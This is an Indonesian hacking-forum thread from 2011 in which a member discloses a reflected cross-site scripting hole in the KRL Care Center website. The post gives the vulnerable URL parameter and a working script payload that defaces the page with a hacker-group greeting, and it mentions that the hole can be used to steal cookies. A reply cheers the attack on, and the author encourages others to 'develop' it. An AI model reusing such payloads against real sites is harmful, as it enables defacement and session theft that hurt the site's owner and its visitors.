Home

About

Milis

Blog Roll

Group Facebook

XCode Magazine

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

Selamat Datang Di Komunitas Yogyafree

Selamat datang di komunitas XCode - Yogyafree - Yogya Family Code. Disini kita saling berbagi ilmu komputer, baik hacking, security, programming, software engineering dan lain sebagainya. Klik disini untuk register

Panel
Welcome! Anonymous

XSS pada situs resmi KRL Care Center

[ Facebook comments]

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Post a reply

XSS pada situs resmi KRL Care Center

Postby Darkzzzz » Thu Nov 10, 2011 12:14 am

Terdapat celah keamanan yang kritis berupa Cross Site Scripting yang bersifat Non-Persistent pada Website KRL Care Center. Walaupun tidak terlalu berbahaya, celah keamanan ini dapat menyebabkan XSS Defacing secara temporer ataupun hanya sekedar mencuri cookie saja. Sayangnya celah XSS ini hanya berjalan pada beberapa Web Browser saja, misalnya : Mozilla Firefox :mrgreen:

Poc
Code: Select all
Proof of Concept :
http://www.krl.co.id/infonew/undang.php?&start=0&p_f=0&t_cari=0&field_id=0&no=[b]Sisipkan Script Di Sini[/b]&kode_kondisi=0


Demo :
Code: Select all
www.krl.co.id/infonew/undang.php?&start=0&p_f=0&t_cari=0&field_id=0&no=<script>document.body.innerHTML="<h1>XSS Defacing</h1>This Site Has XSSed By : X-Cisadane<br/>Greetz To : XCode, Hacker Cisadane, Depok Cyber, Muslim Hackers, Dunia Santai, Borneo Crew, Jiban Crew, etc<br/>Please patch your system";</script>&kode_kondisi=0


Hasil :
Image
I'm not A Hacker, But I'm A Image
User avatar
Darkzzzz
 
Posts: 2206
Joined: Fri Jul 27, 2007 1:59 pm
Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.
Top

Re: XSS pada situs resmi KRL Care Center

Postby ladade » Thu Nov 24, 2011 8:17 pm

wkwkwkmantap joinan ah
ciakakakakakak
sloganku GO A HACK
ladade
 
Posts: 36
Joined: Thu Nov 17, 2011 10:43 pm
Location: denpasar
Top

Re: XSS pada situs resmi KRL Care Center

Postby Darkzzzz » Fri Nov 25, 2011 8:37 pm

ladade wrote:wkwkwkmantap joinan ah
ciakakakakakak

hahahah silahkan om dikembangkan
I'm not A Hacker, But I'm A Image
User avatar
Darkzzzz
 
Posts: 2206
Joined: Fri Jul 27, 2007 1:59 pm
Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.
Top

leave a comment

Post a reply

Return to Web Hacking

Who is online

Users browsing this forum: No registered users and 25 guests

Web Counter Start : December 14th 2009
Hit Counters

http://www.xcode.or.id